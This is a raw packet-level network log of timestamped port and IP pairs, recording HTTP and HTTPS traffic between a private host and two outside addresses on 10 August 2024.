Aug 10, 2024 16:12:25.582288980 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582292080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582304955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582334042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582345963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582367897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582381964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582396030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582410097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582422972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582422972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582422972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582423925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582453012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582566977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582567930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582567930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582906008 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582920074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582933903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582969904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582969904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.582978964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.582993031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583008051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583023071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583024025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583111048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583126068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583129883 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583129883 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583141088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583187103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583201885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583203077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583203077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583228111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583242893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583257914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583271027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583285093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583287954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583287954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583287954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583287954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583300114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583306074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583317041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583329916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583344936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.583364964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583364964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583364964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583471060 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.583484888 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.583548069 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.583548069 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.583558083 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.583754063 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.584022999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584036112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584049940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584096909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584100962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584120989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584124088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584139109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584153891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584168911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584182978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584206104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584206104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584206104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584208965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584222078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584223032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584247112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584261894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584276915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584330082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584330082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584341049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.584371090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.584402084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.590517044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.590538025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.590553045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.590568066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.590569973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.590583086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.590585947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.590598106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.590611935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.590611935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.590636015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.590651989 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.608232021 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608243942 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608315945 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.608319044 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608448982 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.608593941 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608606100 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608690023 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.608694077 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608784914 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.608834028 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608892918 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.608911991 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608961105 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.608999014 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.608999014 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.614861012 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.614871979 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.614953995 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.614953995 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.614957094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.615005970 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.615134001 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.615165949 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.615221977 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.615226984 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.615320921 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.615335941 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.615348101 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.615403891 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.615407944 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.615502119 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.621320009 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.621331930 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.621395111 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.621398926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.623255014 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.629651070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629666090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629678965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629693031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629698038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.629708052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629714966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.629722118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629736900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.629736900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629770041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.629792929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.629890919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629905939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629920006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629935980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629946947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.629951954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629966974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629967928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.629981041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.629988909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630008936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630022049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630115032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630129099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630143881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630161047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630187988 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630187988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630202055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630215883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630232096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630250931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630275965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630279064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630292892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630316019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630331993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630345106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630357981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630362034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630376101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630379915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630397081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630419016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630831957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630846024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630860090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630876064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630883932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630892992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630897045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630912066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630923033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630928040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.630953074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.630971909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631485939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631500006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631514072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631527901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631541967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631541967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631557941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631567955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631572008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631586075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631586075 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631603003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631628990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631756067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631769896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631783962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631798029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631808043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631825924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631828070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631840944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631855965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631870985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631895065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631906033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.631920099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.631951094 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.640073061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.640086889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.640103102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.640167952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.640467882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.640490055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.640511036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.640527964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.640558958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.640568018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641247988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641263008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641277075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641304016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641321898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641563892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641577959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641591072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641604900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641607046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641613960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641627073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641639948 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641791105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641804934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641819954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641834974 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641851902 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641937017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641952991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641966105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.641980886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.641982079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.642004013 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.642024994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644469976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644496918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644511938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644512892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644526958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644541979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644550085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644556999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644570112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644572973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644587994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644613028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644808054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644829035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644851923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644853115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644865036 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644866943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644881010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644882917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644891024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644905090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644915104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644920111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644933939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644949913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644949913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644963980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644974947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644979954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.644990921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.644994020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645004034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645008087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645013094 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645021915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645034075 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645035982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645041943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645050049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645051956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645064116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645066977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645081043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645093918 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645095110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645103931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645108938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645116091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645123959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645128965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645138979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645145893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645153046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645153046 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645167112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645168066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645181894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645181894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645195961 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645196915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645210981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.645212889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.645248890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.670734882 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.670751095 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.670820951 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.670825958 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.670875072 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.671813965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.671828985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.671842098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.671880007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.671966076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.671973944 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.671988964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672003984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672022104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.672025919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.672036886 CEST	80	49740	147.45.44.104	192.168.2.4
